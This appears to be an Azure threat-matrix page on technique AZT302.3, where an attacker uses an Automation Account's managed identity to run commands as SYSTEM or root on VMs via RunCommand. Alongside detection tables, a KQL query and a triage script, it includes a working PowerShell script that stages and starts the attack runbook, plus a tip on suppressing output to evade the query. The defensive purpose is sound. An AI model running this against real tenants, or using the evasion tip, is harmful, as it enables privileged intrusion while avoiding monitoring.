
AZT302.3 - Unmanaged Scripting: Automation Account Managed Identity Account

An attacker who can write, publish and start runbooks in an Automation Account that has a managed identity can use that identity to execute commands on an Azure VM through RunCommand (AZT301.1). The runbook authenticates as the managed identity (Connect-AzAccount -Identity) and, if the identity's service principal holds a role that grants Microsoft.Compute/virtualMachines/runCommand/action on the target VM, the command runs through the VM agent as SYSTEM on Windows or root on Linux. The attacker never needs the identity's credentials; the Automation Account's job sandbox obtains the token.


Resource: Automation Account

Actions:

  • Microsoft.Automation/automationAccounts/runbooks/*
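As an added example (not part of the AzTRM page and not a Microsoft sample), this is how a tester would stage the technique with the Az PowerShell modules: the runbook body calls Connect-AzAccount -Identity and Invoke-AzVMRunCommand, and the Az.Automation cmdlets import, publish and start it, which produces exactly the runbooks/draft/write, runbooks/publish/action and jobs/write operations listed under Detection Details. The resource group, Automation Account, VM and runbook names are assumptions.

```powershell
# Added example, not from the AzTRM page. All names below are assumptions.
# Prerequisites: Az.Accounts and Az.Automation on the operator host; the
# Automation Account has a system-assigned managed identity holding a role that
# includes Microsoft.Compute/virtualMachines/runCommand/action on the VM; the
# operator holds runbooks/* and jobs/write on the Automation Account; the Az
# modules are imported into the Automation Account so the runbook can use them.

# 1. Runbook body. It authenticates as the managed identity, then reaches the
#    VM agent through RunCommand (AZT301.1). Connect-AzAccount writes the
#    Account / SubscriptionName / TenantId context to the job Output stream,
#    which is the text the page's AzureDiagnostics query keys on.
$runbookBody = @'
param(
    [Parameter(Mandatory)] [string] $ResourceGroup,
    [Parameter(Mandatory)] [string] $VmName
)
# Appending "| Out-Null" here would keep the context out of the job streams
# and defeat the page's Log Analytics query; the Activity Log rows still fire.
Connect-AzAccount -Identity

# RunCommand executes the script as SYSTEM (Windows) or root (Linux) on the VM.
$payload = Join-Path $env:TEMP 'payload.ps1'
Set-Content -Path $payload -Value 'whoami; hostname'

$run = Invoke-AzVMRunCommand -ResourceGroupName $ResourceGroup -VMName $VmName `
    -CommandId 'RunPowerShellScript' -ScriptPath $payload
$run.Value | ForEach-Object { $_.Message }
'@
Set-Content -Path .\RunCmd.ps1 -Value $runbookBody

# 2. Stage it from the operator host (Connect-AzAccount as the operator first).
$aa = @{ ResourceGroupName = 'rg-automation'; AutomationAccountName = 'aa-ops' }   # assumed names

# Draft write plus publish in one call: runbooks/draft/write and runbooks/publish/action.
Import-AzAutomationRunbook @aa -Path .\RunCmd.ps1 -Name 'RunCmd' -Type PowerShell -Published

# jobs/write. -Wait blocks until the job finishes and returns its Output stream.
$output = Start-AzAutomationRunbook @aa -Name 'RunCmd' `
    -Parameters @{ ResourceGroup = 'rg-prod'; VmName = 'vm-app01' } -Wait -MaxWaitSeconds 600
$output
```

Every step after Connect-AzAccount on the operator host is an ARM write and lands in the Activity Log with the operator's Caller and CallerIpAddress, which is the pivot a responder uses once the runbook output itself has been spotted.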


Detection Details

Note that the listed query requires a diagnostic setting on the Automation Account that forwards its job stream logs to the Log Analytics workspace being queried. The query matches the Account / SubscriptionName / TenantId context that Connect-AzAccount -Identity writes to a runbook's output stream, so a runbook that suppresses that output (for example by piping Connect-AzAccount to Out-Null) produces no match; pair it with the Activity Log operations in the table below, which are recorded regardless of what the runbook prints.


| Data Source | Operation Name | Action | Log Provider |
| --- | --- | --- | --- |
| Resource | Create an Azure Automation job | Microsoft.Automation/automationAccounts/jobs/write | AzureActivity |
| Resource | Publish an Azure Automation runbook draft | Microsoft.Automation/automationAccounts/runbooks/publish/action | AzureActivity |
| Resource | Write an Azure Automation runbook draft | Microsoft.Automation/automationAccounts/runbooks/draft/write | AzureActivity |
| Resource | Create or Update an Azure Automation Runbook | Microsoft.Automation/automationAccounts/runbooks/write | AzureActivity |


Queries

Platform: Log Analytics

```kql
AzureDiagnostics
| where ResultDescription has 'TenantId'
    and ResultDescription has 'SubscriptionName'
    and ResultDescription has 'Account'
    and ResourceType == 'AUTOMATIONACCOUNTS'
```
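As an added example (not part of the AzTRM page), the following PowerShell runs the page's query from the Az.OperationalInsights module, narrowed to Automation job streams and projected to the fields needed for triage, and then pivots to the jobs/write Activity Log operation from the table above to recover who started the job and from where. The workspace ID and the one-day lookback are assumptions.

```powershell
# Added example, not from the AzTRM page. Workspace ID and lookback are assumptions.
# Requires Az.Accounts and Az.OperationalInsights and a principal with
# Log Analytics Reader on the workspace (run Connect-AzAccount first).
$workspaceId = '00000000-0000-0000-0000-000000000000'   # assumed: workspace (customer) ID
$lookback    = New-TimeSpan -Days 1

# The page's query restricted to Automation JobStreams rows, so that other
# resource types whose ResultDescription happens to contain these words do
# not match, with the job and runbook identifiers projected for triage.
$streamQuery = @'
AzureDiagnostics
| where ResourceProvider == "MICROSOFT.AUTOMATION" and Category == "JobStreams"
| where ResultDescription has "TenantId"
    and ResultDescription has "SubscriptionName"
    and ResultDescription has "Account"
| project TimeGenerated, Resource, RunbookName_s, JobId_g, StreamType_s, ResultDescription
| order by TimeGenerated desc
'@

# Pivot: jobs/write is the Activity Log operation that creates the job;
# Caller is the UPN or application ID that started it.
$jobQuery = @'
AzureActivity
| where OperationNameValue =~ "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/JOBS/WRITE"
| project TimeGenerated, Caller, CallerIpAddress, ResourceGroup, _ResourceId, ActivityStatusValue
| order by TimeGenerated desc
'@

$streams = (Invoke-AzOperationalInsightsQuery -WorkspaceId $workspaceId -Query $streamQuery -Timespan $lookback).Results
$jobs    = (Invoke-AzOperationalInsightsQuery -WorkspaceId $workspaceId -Query $jobQuery    -Timespan $lookback).Results

if ($streams) {
    Write-Host "Runbook jobs that printed a managed-identity context in the last $($lookback.TotalHours) h:"
    $streams | Format-Table TimeGenerated, Resource, RunbookName_s, JobId_g -AutoSize
    Write-Host "Job creations in the same window (match on Resource and time):"
    $jobs | Format-Table TimeGenerated, Caller, CallerIpAddress, ResourceGroup -AutoSize
} else {
    Write-Host "No matching job streams; confirm the Automation Account's diagnostic setting sends JobStreams to this workspace."
}
```

Because the Activity Log query does not depend on runbook output, it still returns the job creation when the runbook silenced Connect-AzAccount; a jobs/write from an unexpected Caller or CallerIpAddress with no corresponding context line in the job streams is itself worth a look.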

Azure Monitor Alert

Deploy to Azure